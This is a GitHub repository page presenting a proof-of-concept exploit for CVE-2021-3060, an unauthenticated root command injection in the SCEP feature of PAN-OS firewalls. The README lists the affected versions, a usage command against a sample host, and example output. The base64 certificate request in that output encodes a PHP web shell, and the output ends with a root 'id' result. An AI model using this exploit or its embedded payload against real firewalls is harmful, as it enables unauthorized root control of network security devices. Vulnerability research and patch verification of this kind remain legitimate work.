Skip to content

anmolksachan/CVE-2021-3060

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits

CVE-2021-3060.py

CVE-2021-3060.py

 
 

README.md

README.md

 
 

requirements.txt

requirements.txt

 
 

Repository files navigation

CVE-2021-3060 POC/ Exploit

Description:

An OS command injection vulnerability in the Simple Certificate Enrollment Protocol (SCEP) feature of PAN-OS software allows an unauthenticated network-based attacker with specific knowledge of the firewall configuration to execute arbitrary code with root user privileges. The attacker must have network access to the GlobalProtect interfaces to exploit this issue. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.20-h1; PAN-OS 9.0 versions earlier than PAN-OS 9.0.14-h3; PAN-OS 9.1 versions earlier than PAN-OS 9.1.11-h2; PAN-OS 10.0 versions earlier than PAN-OS 10.0.8; PAN-OS 10.1 versions earlier than PAN-OS 10.1.3. Prisma Access customers with Prisma Access 2.1 Preferred and Prisma Access 2.1 Innovation firewalls are impacted by this issue.

Weaknesses:

CWE-78

Link:

https://nvd.nist.gov/vuln/detail/CVE-2021-3060

example output:

$ python3 cve-2021-3060.py http://panw.local test-scep-profile
Certificate Request:
    Data:
        Version: 0 (0x0)
        Subject: serialNumber=test, CN=uid=99(nobody) gid=99(nobody) groups=99(nobody)
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (512 bit)
                Modulus:
                    00:be:e2:cc:14:7e:94:ef:5d:59:1c:3b:17:92:c0:
                    34:ce:10:67:c7:c4:26:24:f1:52:b4:65:c7:a6:68:
                    c4:2b:ef:99:7c:f8:53:c3:ad:0b:f0:d0:8e:f2:62:
                    94:52:4c:1b:bb:c9:47:63:35:1b:f3:f6:fe:1b:f4:
                    d9:45:44:64:93
                Exponent: 65537 (0x10001)
        Attributes:
            challengePassword        :challenge
    Signature Algorithm: sha256WithRSAEncryption
         a9:c1:56:6d:86:4f:3e:d6:5a:99:33:37:f6:40:a6:7d:19:0c:
         63:3d:a2:bd:d1:45:e9:f2:50:b3:3c:65:fc:a7:9b:3e:81:64:
         d1:96:99:d6:f4:9b:a2:ed:3c:5d:da:ec:bb:69:55:e0:fc:59:
         53:30:3f:a7:ed:d6:71:da:a6:7e
-----BEGIN CERTIFICATE REQUEST-----
MIIBCTCBtAIBADA1MQ0wCwYDVQQFEwR0ZXN0MSQwIgYDVQQDFBs8P3BocCBwYXNz
dGhydSgkX0dFVFswXSk7Pz4wXDANBgkqhkiG9w0BAQEFAANLADBIAkEAvuLMFH6U
711ZHDsXksA0zhBnx8QmJPFStGXHpmjEK++ZfPhTw60L8NCO8mKUUkwbu8lHYzUb
8/b+G/TZRURkkwIDAQABoBowGAYJKoZIhvcNAQkHMQsTCWNoYWxsZW5nZTANBgkq
hkiG9w0BAQsFAANBAKnBVm2GTz7WWpkzN/ZApn0ZDGM9or3RRenyULM8Zfynmz6B
ZNGWmdb0m6LtPF3a7LtpVeD8WVMwP6ft1nHapn4=
-----END CERTIFICATE REQUEST-----

uid=0(root) gid=0(root) groups=0(root)

Note: The script is an updated version picked from https://gist.github.com/rqu1/8ed4f51fd90dd82fc89111340e26a756 and used python3.

About

CVE-2021-3060

gist.github.com/rqu1/8ed4f51fd90dd82fc89111340e26a756

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages